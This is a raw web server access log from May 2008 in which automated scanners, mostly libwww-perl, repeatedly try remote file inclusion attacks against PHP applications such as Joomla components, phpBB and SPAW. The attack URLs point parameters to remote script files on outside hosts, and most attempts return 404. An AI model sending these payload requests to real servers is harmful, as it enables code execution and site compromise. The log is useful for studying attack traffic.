193.34.16.180 - - [03/May/2008:09:34:36 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.13.188 - - [03/May/2008:09:34:41 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:34:49 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.134.252.194 - - [03/May/2008:09:34:52 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:34:59 -0700] "GET /logs/access_080321.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aftab.ae/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:34:59 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aftab.ae/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.106.117 - - [03/May/2008:09:34:59 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aftab.ae/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.64.29 - - [03/May/2008:09:35:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.64.29 - - [03/May/2008:09:35:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:35:26 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.217.3 - - [03/May/2008:09:35:26 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:35:31 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:35:31 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:35:48 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:35:49 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.51.25.186 - - [03/May/2008:09:35:49 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:10 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:12 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:13 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:36:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:36:19 -0700] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [03/May/2008:09:36:19 -0700] "GET //sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:36:20 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:36:20 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:29 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:32 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:36:34 -0700] "GET /logs/index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [03/May/2008:09:36:40 -0700] "GET /index.php?configFile=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:50 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:50 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:51 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:51 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:52 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:53 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:54 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:54 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:55 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:09:36:56 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:09:36:56 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:36:59 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:04 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.27.19.194 - - [03/May/2008:09:37:06 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:19 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:19 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:19 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:37:24 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:37:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:37:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:25 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:29 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:29 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:37:29 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.27.19.194 - - [03/May/2008:09:37:36 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:37:37 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:37:39 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:37:40 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:38:04 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.21.99 - - [03/May/2008:09:38:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.26 - - [03/May/2008:09:38:19 -0700] "GET /logs/access_080424.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.218.85.18 - - [03/May/2008:09:38:59 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:01 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:39:03 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:39:03 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:39:04 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:27 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:39:28 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:28 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:39:28 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:39:29 -0700] "GET /logs/access_080304.log/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:39:30 -0700] "GET /components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:39:31 -0700] "GET /logs/components/com_sef/sefclass.php?mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:39:33 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:39:44 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:39:44 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:39:45 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.205.243.47 - - [03/May/2008:09:40:24 -0700] "GET /logs/access_071215.log HTTP/1.0" 200 124992 "http://alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=all&q=510@yahoo.com.sg+@yahoo.com.cn+@sg.com.cn&itag=crv&l=en&ics=utf-8&cs=utf8&wf%5Bn%5D=3&wf%5B0%5D%5Br%5D=%2B&wf%5B0%5D%5Bq%5D=510&wf%5B0%5D%5Bw%5D=&wf%5B1%5D%5Br%5D=%2B&wf%5B1%5D%5Bq%5D=@yahoo.com.sg%2C@yahoo.com.cn+@sg.com.cn+&wf%5B1%5D%5Bw%5D=&wf%5B2%5D%5Br%5D=-&wf%5B2%5D%5Bq%5D=%2C&wf%5B2%5D%5Bw%5D=&dincl=&dexcl=&geo=&doctype=text&dfr%5Bd%5D=1&dfr%5Bm%5D=1&dfr%5By%5D=1980&dto%5Bd%5D=3&dto%5Bm%5D=5&dto%5By%5D=2008&hits=10" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:40:40 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:40:43 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:09:40:47 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.29.81.233 - - [03/May/2008:09:41:14 -0700] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.173.45 - - [03/May/2008:09:41:28 -0700] "GET /logs/index2.php?showpage=http://www.mariosoucy.com/voicefiles/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [03/May/2008:09:41:29 -0700] "GET /index2.php?showpage=http://www.mariosoucy.com/voicefiles/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.92.9 - - [03/May/2008:09:42:09 -0700] "GET /main.php?pagina=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
80.86.92.9 - - [03/May/2008:09:42:10 -0700] "GET /logs/main.php?pagina=http://www.pmstudio.net/thc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:42:40 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:42:41 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:09:42:42 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:42:45 -0700] "GET /logs/access.log/index.php?include=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:42:46 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:42:46 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.174.121 - - [03/May/2008:09:42:46 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:42:48 -0700] "GET /index.php?include=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [03/May/2008:09:42:49 -0700] "GET /logs/index.php?include=http://www.dd3str0y3r.kit.net/scan/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:09:43:00 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.231.1.90 - - [03/May/2008:09:43:05 -0700] "GET /classes/core/language.php?rootdir=http://www.freewebs.com/haddem/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.193.222.176 - - [03/May/2008:09:43:44 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.28.68.88 - - [03/May/2008:09:44:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
